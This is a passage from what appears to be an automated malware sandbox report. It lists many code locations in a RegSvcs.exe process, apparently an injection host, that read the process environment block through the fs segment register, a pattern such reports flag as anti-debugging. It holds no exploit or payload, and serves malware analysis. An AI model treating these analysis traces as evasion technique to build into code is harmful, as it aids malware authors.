                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0163E3DB mov ecx, dword ptr fs:[00000030h]8_2_0163E3DB
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0163E3DB mov eax, dword ptr fs:[00000030h]8_2_0163E3DB
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_01588397 mov eax, dword ptr fs:[00000030h]8_2_01588397
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_01588397 mov eax, dword ptr fs:[00000030h]8_2_01588397
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_01588397 mov eax, dword ptr fs:[00000030h]8_2_01588397
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0158E388 mov eax, dword ptr fs:[00000030h]8_2_0158E388
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0158E388 mov eax, dword ptr fs:[00000030h]8_2_0158E388
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0158E388 mov eax, dword ptr fs:[00000030h]8_2_0158E388
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_015B438F mov eax, dword ptr fs:[00000030h]8_2_015B438F
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_015B438F mov eax, dword ptr fs:[00000030h]8_2_015B438F
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_01596259 mov eax, dword ptr fs:[00000030h]8_2_01596259
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0158A250 mov eax, dword ptr fs:[00000030h]8_2_0158A250
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_01640274 mov eax, dword ptr fs:[00000030h]8_2_01640274
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_01640274 mov eax, dword ptr fs:[00000030h]8_2_01640274
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_01640274 mov eax, dword ptr fs:[00000030h]8_2_01640274
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_01640274 mov eax, dword ptr fs:[00000030h]8_2_01640274
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_01640274 mov eax, dword ptr fs:[00000030h]8_2_01640274
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_01640274 mov eax, dword ptr fs:[00000030h]8_2_01640274
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_01640274 mov eax, dword ptr fs:[00000030h]8_2_01640274
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_01640274 mov eax, dword ptr fs:[00000030h]8_2_01640274
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_01640274 mov eax, dword ptr fs:[00000030h]8_2_01640274
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_01640274 mov eax, dword ptr fs:[00000030h]8_2_01640274
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_01640274 mov eax, dword ptr fs:[00000030h]8_2_01640274
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_01640274 mov eax, dword ptr fs:[00000030h]8_2_01640274
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_01618243 mov eax, dword ptr fs:[00000030h]8_2_01618243
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_01618243 mov ecx, dword ptr fs:[00000030h]8_2_01618243
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0158826B mov eax, dword ptr fs:[00000030h]8_2_0158826B
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0164A250 mov eax, dword ptr fs:[00000030h]8_2_0164A250
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0164A250 mov eax, dword ptr fs:[00000030h]8_2_0164A250
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_01594260 mov eax, dword ptr fs:[00000030h]8_2_01594260
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_01594260 mov eax, dword ptr fs:[00000030h]8_2_01594260
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_01594260 mov eax, dword ptr fs:[00000030h]8_2_01594260
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0166625D mov eax, dword ptr fs:[00000030h]8_2_0166625D
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0158823B mov eax, dword ptr fs:[00000030h]8_2_0158823B
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0159A2C3 mov eax, dword ptr fs:[00000030h]8_2_0159A2C3
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0159A2C3 mov eax, dword ptr fs:[00000030h]8_2_0159A2C3
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0159A2C3 mov eax, dword ptr fs:[00000030h]8_2_0159A2C3
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0159A2C3 mov eax, dword ptr fs:[00000030h]8_2_0159A2C3
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0159A2C3 mov eax, dword ptr fs:[00000030h]8_2_0159A2C3
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_016662D6 mov eax, dword ptr fs:[00000030h]8_2_016662D6
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_015A02E1 mov eax, dword ptr fs:[00000030h]8_2_015A02E1
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_015A02E1 mov eax, dword ptr fs:[00000030h]8_2_015A02E1
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_015A02E1 mov eax, dword ptr fs:[00000030h]8_2_015A02E1
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_016262A0 mov eax, dword ptr fs:[00000030h]8_2_016262A0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_016262A0 mov ecx, dword ptr fs:[00000030h]8_2_016262A0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_016262A0 mov eax, dword ptr fs:[00000030h]8_2_016262A0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_016262A0 mov eax, dword ptr fs:[00000030h]8_2_016262A0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_016262A0 mov eax, dword ptr fs:[00000030h]8_2_016262A0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_016262A0 mov eax, dword ptr fs:[00000030h]8_2_016262A0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_015CE284 mov eax, dword ptr fs:[00000030h]8_2_015CE284
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_015CE284 mov eax, dword ptr fs:[00000030h]8_2_015CE284
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_01610283 mov eax, dword ptr fs:[00000030h]8_2_01610283
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_01610283 mov eax, dword ptr fs:[00000030h]8_2_01610283
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_01610283 mov eax, dword ptr fs:[00000030h]8_2_01610283
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_015A02A0 mov eax, dword ptr fs:[00000030h]8_2_015A02A0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_015A02A0 mov eax, dword ptr fs:[00000030h]8_2_015A02A0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_01598550 mov eax, dword ptr fs:[00000030h]8_2_01598550
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_01598550 mov eax, dword ptr fs:[00000030h]8_2_01598550
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_015C656A mov eax, dword ptr fs:[00000030h]8_2_015C656A
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_015C656A mov eax, dword ptr fs:[00000030h]8_2_015C656A
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_015C656A mov eax, dword ptr fs:[00000030h]8_2_015C656A
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_01626500 mov eax, dword ptr fs:[00000030h]8_2_01626500
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_015BE53E mov eax, dword ptr fs:[00000030h]8_2_015BE53E
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_015BE53E mov eax, dword ptr fs:[00000030h]8_2_015BE53E
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_015BE53E mov eax, dword ptr fs:[00000030h]8_2_015BE53E
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_015BE53E mov eax, dword ptr fs:[00000030h]8_2_015BE53E
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_015BE53E mov eax, dword ptr fs:[00000030h]8_2_015BE53E
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_01664500 mov eax, dword ptr fs:[00000030h]8_2_01664500
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_01664500 mov eax, dword ptr fs:[00000030h]8_2_01664500
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_01664500 mov eax, dword ptr fs:[00000030h]8_2_01664500
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_01664500 mov eax, dword ptr fs:[00000030h]8_2_01664500
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_01664500 mov eax, dword ptr fs:[00000030h]8_2_01664500
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_01664500 mov eax, dword ptr fs:[00000030h]8_2_01664500
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_01664500 mov eax, dword ptr fs:[00000030h]8_2_01664500
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_015A0535 mov eax, dword ptr fs:[00000030h]8_2_015A0535
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_015A0535 mov eax, dword ptr fs:[00000030h]8_2_015A0535
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_015A0535 mov eax, dword ptr fs:[00000030h]8_2_015A0535
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_015A0535 mov eax, dword ptr fs:[00000030h]8_2_015A0535
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_015A0535 mov eax, dword ptr fs:[00000030h]8_2_015A0535
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_015A0535 mov eax, dword ptr fs:[00000030h]8_2_015A0535
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_015965D0 mov eax, dword ptr fs:[00000030h]8_2_015965D0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_015CA5D0 mov eax, dword ptr fs:[00000030h]8_2_015CA5D0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_015CA5D0 mov eax, dword ptr fs:[00000030h]8_2_015CA5D0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_015CE5CF mov eax, dword ptr fs:[00000030h]8_2_015CE5CF
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_015CE5CF mov eax, dword ptr fs:[00000030h]8_2_015CE5CF
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_015CC5ED mov eax, dword ptr fs:[00000030h]8_2_015CC5ED
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_015CC5ED mov eax, dword ptr fs:[00000030h]8_2_015CC5ED
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_015925E0 mov eax, dword ptr fs:[00000030h]8_2_015925E0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_015BE5E7 mov eax, dword ptr fs:[00000030h]8_2_015BE5E7
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_015BE5E7 mov eax, dword ptr fs:[00000030h]8_2_015BE5E7
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_015BE5E7 mov eax, dword ptr fs:[00000030h]8_2_015BE5E7
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_015BE5E7 mov eax, dword ptr fs:[00000030h]8_2_015BE5E7
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_015BE5E7 mov eax, dword ptr fs:[00000030h]8_2_015BE5E7
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_015BE5E7 mov eax, dword ptr fs:[00000030h]8_2_015BE5E7
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_015BE5E7 mov eax, dword ptr fs:[00000030h]8_2_015BE5E7
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_015BE5E7 mov eax, dword ptr fs:[00000030h]8_2_015BE5E7
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_015CE59C mov eax, dword ptr fs:[00000030h]8_2_015CE59C
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_016105A7 mov eax, dword ptr fs:[00000030h]8_2_016105A7
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_016105A7 mov eax, dword ptr fs:[00000030h]8_2_016105A7
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_016105A7 mov eax, dword ptr fs:[00000030h]8_2_016105A7
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_015C4588 mov eax, dword ptr fs:[00000030h]8_2_015C4588
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_01592582 mov eax, dword ptr fs:[00000030h]8_2_01592582
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_01592582 mov ecx, dword ptr fs:[00000030h]8_2_01592582
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_015B45B1 mov eax, dword ptr fs:[00000030h]8_2_015B45B1
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_015B45B1 mov eax, dword ptr fs:[00000030h]8_2_015B45B1
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_015B245A mov eax, dword ptr fs:[00000030h]8_2_015B245A
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0161C460 mov ecx, dword ptr fs:[00000030h]8_2_0161C460
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0158645D mov eax, dword ptr fs:[00000030h]8_2_0158645D
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_015CE443 mov eax, dword ptr fs:[00000030h]8_2_015CE443
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_015CE443 mov eax, dword ptr fs:[00000030h]8_2_015CE443
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_015CE443 mov eax, dword ptr fs:[00000030h]8_2_015CE443
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_015CE443 mov eax, dword ptr fs:[00000030h]8_2_015CE443
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_015CE443 mov eax, dword ptr fs:[00000030h]8_2_015CE443
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_015CE443 mov eax, dword ptr fs:[00000030h]8_2_015CE443
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_015CE443 mov eax, dword ptr fs:[00000030h]8_2_015CE443
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_015CE443 mov eax, dword ptr fs:[00000030h]8_2_015CE443
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_015BA470 mov eax, dword ptr fs:[00000030h]8_2_015BA470
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_015BA470 mov eax, dword ptr fs:[00000030h]8_2_015BA470
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_015BA470 mov eax, dword ptr fs:[00000030h]8_2_015BA470
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0164A456 mov eax, dword ptr fs:[00000030h]8_2_0164A456
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_01616420 mov eax, dword ptr fs:[00000030h]8_2_01616420
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_01616420 mov eax, dword ptr fs:[00000030h]8_2_01616420
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_01616420 mov eax, dword ptr fs:[00000030h]8_2_01616420
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_01616420 mov eax, dword ptr fs:[00000030h]8_2_01616420
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_01616420 mov eax, dword ptr fs:[00000030h]8_2_01616420
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_01616420 mov eax, dword ptr fs:[00000030h]8_2_01616420
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_01616420 mov eax, dword ptr fs:[00000030h]8_2_01616420
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_015C8402 mov eax, dword ptr fs:[00000030h]8_2_015C8402
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_015C8402 mov eax, dword ptr fs:[00000030h]8_2_015C8402
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_015C8402 mov eax, dword ptr fs:[00000030h]8_2_015C8402
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0158E420 mov eax, dword ptr fs:[00000030h]8_2_0158E420
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0158E420 mov eax, dword ptr fs:[00000030h]8_2_0158E420
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0158E420 mov eax, dword ptr fs:[00000030h]8_2_0158E420
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0158C427 mov eax, dword ptr fs:[00000030h]8_2_0158C427
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_015904E5 mov ecx, dword ptr fs:[00000030h]8_2_015904E5
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0161A4B0 mov eax, dword ptr fs:[00000030h]8_2_0161A4B0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_015C44B0 mov ecx, dword ptr fs:[00000030h]8_2_015C44B0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_015964AB mov eax, dword ptr fs:[00000030h]8_2_015964AB
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0164A49A mov eax, dword ptr fs:[00000030h]8_2_0164A49A
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_01590750 mov eax, dword ptr fs:[00000030h]8_2_01590750
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_015D2750 mov eax, dword ptr fs:[00000030h]8_2_015D2750
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_015D2750 mov eax, dword ptr fs:[00000030h]8_2_015D2750
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_015C674D mov esi, dword ptr fs:[00000030h]8_2_015C674D
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_015C674D mov eax, dword ptr fs:[00000030h]8_2_015C674D
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_015C674D mov eax, dword ptr fs:[00000030h]8_2_015C674D
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_01598770 mov eax, dword ptr fs:[00000030h]8_2_01598770
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_015A0770 mov eax, dword ptr fs:[00000030h]8_2_015A0770
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_015A0770 mov eax, dword ptr fs:[00000030h]8_2_015A0770
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_015A0770 mov eax, dword ptr fs:[00000030h]8_2_015A0770
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_015A0770 mov eax, dword ptr fs:[00000030h]8_2_015A0770
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_015A0770 mov eax, dword ptr fs:[00000030h]8_2_015A0770
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_015A0770 mov eax, dword ptr fs:[00000030h]8_2_015A0770
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_015A0770 mov eax, dword ptr fs:[00000030h]8_2_015A0770
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_015A0770 mov eax, dword ptr fs:[00000030h]8_2_015A0770
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_015A0770 mov eax, dword ptr fs:[00000030h]8_2_015A0770
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_015A0770 mov eax, dword ptr fs:[00000030h]8_2_015A0770
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_015A0770 mov eax, dword ptr fs:[00000030h]8_2_015A0770
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_015A0770 mov eax, dword ptr fs:[00000030h]8_2_015A0770
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_01614755 mov eax, dword ptr fs:[00000030h]8_2_01614755
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0161E75D mov eax, dword ptr fs:[00000030h]8_2_0161E75D
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_01590710 mov eax, dword ptr fs:[00000030h]8_2_01590710
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_015C0710 mov eax, dword ptr fs:[00000030h]8_2_015C0710
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0160C730 mov eax, dword ptr fs:[00000030h]8_2_0160C730
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_015CC700 mov eax, dword ptr fs:[00000030h]8_2_015CC700
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_015C273C mov eax, dword ptr fs:[00000030h]8_2_015C273C
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_015C273C mov ecx, dword ptr fs:[00000030h]8_2_015C273C
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_015C273C mov eax, dword ptr fs:[00000030h]8_2_015C273C
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_015CC720 mov eax, dword ptr fs:[00000030h]8_2_015CC720
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_015CC720 mov eax, dword ptr fs:[00000030h]8_2_015CC720
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0161E7E1 mov eax, dword ptr fs:[00000030h]8_2_0161E7E1
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0159C7C0 mov eax, dword ptr fs:[00000030h]8_2_0159C7C0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_016107C3 mov eax, dword ptr fs:[00000030h]8_2_016107C3
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_015947FB mov eax, dword ptr fs:[00000030h]8_2_015947FB
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_015947FB mov eax, dword ptr fs:[00000030h]8_2_015947FB
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_015B27ED mov eax, dword ptr fs:[00000030h]8_2_015B27ED
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_015B27ED mov eax, dword ptr fs:[00000030h]8_2_015B27ED
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_015B27ED mov eax, dword ptr fs:[00000030h]8_2_015B27ED
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_016447A0 mov eax, dword ptr fs:[00000030h]8_2_016447A0
